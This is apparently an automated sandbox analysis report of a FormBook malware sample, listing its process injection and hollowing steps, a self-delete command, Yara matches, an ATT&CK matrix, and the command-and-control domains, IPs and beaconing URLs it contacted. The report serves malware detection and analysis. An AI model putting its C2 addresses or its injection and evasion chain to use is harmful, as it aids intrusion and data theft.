          Source: C:\Users\user\Desktop\583475.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\583475.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: A7E008
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\583475.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\583475.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3424
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\583475.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 00000009.00000000.742102073.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000009.00000000.751150955.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Users\user\Desktop\583475.exe VolumeInformation
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Users\user\Desktop\583475.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection812Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection812NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510246 Sample: 583475.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 34 www.eeeptou.xyz 2->34 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Yara detected FormBook 2->56 58 5 other signatures 2->58 10 583475.exe 15 4 2->10         started        signatures3 process4 dnsIp5 42 www.google.com 142.250.185.228, 443, 49757 GOOGLEUS United States 10->42 30 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 10->30 dropped 32 C:\Users\user\AppData\...\583475.exe.log, ASCII 10->32 dropped 60 Writes to foreign memory regions 10->60 62 Allocates memory in foreign processes 10->62 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 10->64 66 Injects a PE file into a foreign processes 10->66 15 AddInProcess32.exe 10->15         started        file6 signatures7 process8 signatures9 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 2 other signatures 15->74 18 cmstp.exe 15->18         started        21 explorer.exe 15->21 injected 24 autofmt.exe 15->24         started        process10 dnsIp11 44 Modifies the context of a thread in another process (thread injection) 18->44 46 Maps a DLL or memory area into another process 18->46 48 Tries to detect virtualization through RDTSC time measurements 18->48 26 cmd.exe 1 18->26         started        36 appsdeals14.com 68.66.224.28, 49835, 80 A2HOSTINGUS United States 21->36 38 www.tinyhollywood.com 21->38 40 2 other IPs or domains 21->40 50 System process connects to network (likely due to code injection or exploit) 21->50 signatures12 process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          583475.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.0.AddInProcess32.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.AddInProcess32.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.AddInProcess32.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.eeeptou.xyz/uat8/0%Avira URL Cloudsafe
          http://ns.adobe.c/gE0%Avira URL Cloudsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobjE0%Avira URL Cloudsafe
          http://ns.ado/1E0%Avira URL Cloudsafe
          http://ns.d0%URL Reputationsafe
          http://www.tinyhollywood.com/uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD0%Avira URL Cloudsafe
          http://www.appsdeals14.com/uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD0%Avira URL Cloudsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.eeeptou.xyz
          		104.21.96.92
          		truetrue
            		unknown
            tinyhollywood.com
            		34.102.136.180
            		truefalse
              		unknown
              www.google.com
              		142.250.185.228
              		truefalse
                		high
                appsdeals14.com
                		68.66.224.28
                		truetrue
                  		unknown
                  www.appsdeals14.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.tinyhollywood.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      www.eeeptou.xyz/uat8/true
                      • Avira URL Cloud: safe
                      		low
                      http://www.tinyhollywood.com/uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXADfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.appsdeals14.com/uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXADtrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.com/false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.google.com583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpfalse
                          		high
                          http://ns.adobe.c/gE583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ns.adobe.cobj583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ns.adobe.cobjE583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ns.ado/1E583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ns.d583475.exe, 00000000.00000003.658913034.0000000006D81000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ns.adobe.c/g583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpfalse
                            		high
                            http://ns.ado/1583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            142.250.185.228
                            		www.google.comUnited States
                            		15169GOOGLEUSfalse
                            34.102.136.180
                            		tinyhollywood.comUnited States
                            		15169GOOGLEUSfalse
                            68.66.224.28
                            		appsdeals14.comUnited States
                            		55293A2HOSTINGUStrue

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:510246
                            Start date:27.10.2021
                            Start time:16:28:10
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 11m 0s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:583475.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@10/2@4/3
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 21.4% (good quality ratio 19.2%)
                            • Quality average: 71.4%
                            • Quality standard deviation: 32%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 131.253.33.200, 13.107.22.200, 20.82.209.183, 20.54.110.249, 40.112.88.60, 40.91.112.76, 80.67.82.211, 80.67.82.235, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            16:29:05API Interceptor212x Sleep call for process: 583475.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            68.66.224.28http://nestjs-doc.exceptionfound.com/interfaces/classtransformoptions.htmlGet hashmaliciousBrowse
                            • nestjs-doc.exceptionfound.com/interfaces/classtransformoptions.html

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            A2HOSTINGUSSecuriteInfo.com.Trojan.GenericKD.47258968.7621.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            Factura FAN CourierFAN Courier Invoice 7038848_pdf.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            Scan_Documentsfile00384740599HFH4.exeGet hashmaliciousBrowse
                            • 85.187.132.177
                            HTK TT600202109300860048866 Payment Proof.pdf.exeGet hashmaliciousBrowse
                            • 185.146.22.238
                            SDL_Order Onay#U0131 _ Acil,pdf.exeGet hashmaliciousBrowse
                            • 70.32.23.53
                            Progetto Plastisavio S.p.A. 19_10_2021_pdf.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            jew.x86Get hashmaliciousBrowse
                            • 68.66.210.7
                            Schenker Italiana S.p.A. CW305.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            PyZcDaysXOGet hashmaliciousBrowse
                            • 185.148.131.2
                            Orden de compra n_ 393116209.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            Update-KB250-x86.exeGet hashmaliciousBrowse
                            • 85.187.148.2
                            Update-KB2984-x86.exeGet hashmaliciousBrowse
                            • 85.187.148.2
                            test2.dllGet hashmaliciousBrowse
                            • 185.146.22.232
                            doc.msg.exeGet hashmaliciousBrowse
                            • 85.187.148.2
                            Confirm_Sept_Invoice.htmlGet hashmaliciousBrowse
                            • 68.66.226.75
                            New_AMT_Policy.htmlGet hashmaliciousBrowse
                            • 68.66.226.75
                            New_AMT_Policy.htmlGet hashmaliciousBrowse
                            • 68.66.226.75
                            DOCUMENT TRK.docGet hashmaliciousBrowse
                            • 85.187.128.246

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            54328bd36c14bd82ddaa0c04b25ed9adTEaKKn2Dkf.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            Km5KAxQLLV.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            P.O_45030090VT_Glaserei_Gueney.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            mJ1frOovsp.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            PRODUCT ENQUIRY #20211027.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            IB5eMmKwbD.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            Duty invoice & clearance document.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            Shipment #45523666245.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            PO No-512 3111.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            IDSTATEMENTS.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            avocFyG.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            r18qGHf6vL.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            DHL_document11022020680908911.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            Goldschmidt_P.O_342044090VT.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            36#U0443.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            ssjZo49L9R.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            S011814021275597.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            f25d7dae55dc8c848e9fed3f218f886f4ca4412e5b94a.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            8cc8f28391efb0099a231da1df27d6acc2a9dbfdc11d5.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            xmzY7ZAuZp.exeGet hashmaliciousBrowse
                            • 142.250.185.228

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            C:\Users\user\AppData\Local\Temp\AddInProcess32.exeNewOrderPDF.exeGet hashmaliciousBrowse
                              DHLExpress_Shipment101909.exeGet hashmaliciousBrowse
                                Niki-Gmbh Germany Inquiry.exeGet hashmaliciousBrowse
                                  Enquiry MW886079 ( Flowstar.CO.UK ).exeGet hashmaliciousBrowse
                                    Order18102021.exeGet hashmaliciousBrowse
                                      DHL_Ship_152021.exeGet hashmaliciousBrowse
                                        DO854.exeGet hashmaliciousBrowse
                                          DrAlj265av.exeGet hashmaliciousBrowse
                                            masa_prot.exeGet hashmaliciousBrowse
                                              75lT7DuXrs.exeGet hashmaliciousBrowse
                                                dark.exeGet hashmaliciousBrowse
                                                  tortilla.exeGet hashmaliciousBrowse
                                                    dark.exeGet hashmaliciousBrowse
                                                      2xYyRwsd4z.exeGet hashmaliciousBrowse
                                                        bNaLNMv3po.exeGet hashmaliciousBrowse
                                                          uUdLeF2vh0.exeGet hashmaliciousBrowse
                                                            DHL_Express1102021.exeGet hashmaliciousBrowse
                                                              VsRff7UbXL.exeGet hashmaliciousBrowse
                                                                DHL_Shipment_20210621.exeGet hashmaliciousBrowse
                                                                  SH_07391564.exeGet hashmaliciousBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\583475.exe.log
                                                                    Process:C:\Users\user\Desktop\583475.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1402
                                                                    Entropy (8bit):5.338819835253785
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4x84bE4K5AE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKoesXE8:MIHK5HKXE1qHxvbHK5AHKzvRYHKhQnoe
                                                                    MD5:1B32E71ED0326337C6593D13A55E54F4
                                                                    SHA1:0452CD9E26B6C35A3D186FD6DDB1B3365AFDB16C
                                                                    SHA-256:047E61E1F57F4922CA346203710E828859BB61800D9A72C2E64092EBB218CCA8
                                                                    SHA-512:1B5BF6D43F14FFEC6A58366222F606CB9EA1781E9E4A7E6F340E9982DD82F296ACA693EA94105F78705C01D254A7B7897050C7289CC942122C7B83221CC15DAA
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Co
                                                                    C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                    Process:C:\Users\user\Desktop\583475.exe
                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):42080
                                                                    Entropy (8bit):6.2125074198825105
                                                                    Encrypted:false
                                                                    SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
